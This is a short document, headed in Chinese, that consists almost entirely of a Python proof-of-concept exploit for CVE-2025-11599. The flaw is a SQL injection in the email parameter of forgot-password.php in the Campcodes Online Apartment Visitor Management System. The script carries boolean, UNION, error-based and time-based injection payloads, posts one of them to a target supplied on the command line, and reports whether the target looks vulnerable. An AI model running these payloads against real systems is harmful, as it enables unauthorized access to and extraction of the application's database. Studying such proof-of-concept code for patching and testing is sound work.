CVE-2025-11599 Campcodes公寓访客管理系统SQL注入漏洞

# CVE-2025-11599 - Campcodes Online Apartment Visitor Management System SQL Injection PoC # Vulnerability location: /forgot-password.php # Vulnerable parameter: email import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com" VULNERABLE_ENDPOINT = "/forgot-password.php" def exploit_sqli(target_url): """ Exploit SQL injection in the email parameter of forgot-password.php """ # Payload 1: Boolean-based blind SQL injection to test for vulnerability payload_boolean = "[email protected]' OR '1'='1" # Payload 2: UNION-based injection to extract data payload_union = "[email protected]' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -" # Payload 3: Error-based injection payload_error = "[email protected]' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)-- -" # Payload 4: Time-based blind injection payload_time = "[email protected]' AND SLEEP(5)-- -" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } # Test with boolean-based injection data = { "email": payload_boolean, "submit": "Submit" } try: response = requests.post( target_url + VULNERABLE_ENDPOINT, data=data, headers=headers, timeout=10 ) print(f"[+] Target: {target_url}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") if response.status_code == 200 and "error" not in response.text.lower(): print("[+] Target appears to be vulnerable to SQL injection!") return True else: print("[-] Target may not be vulnerable") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": target = TARGET_URL exploit_sqli(target)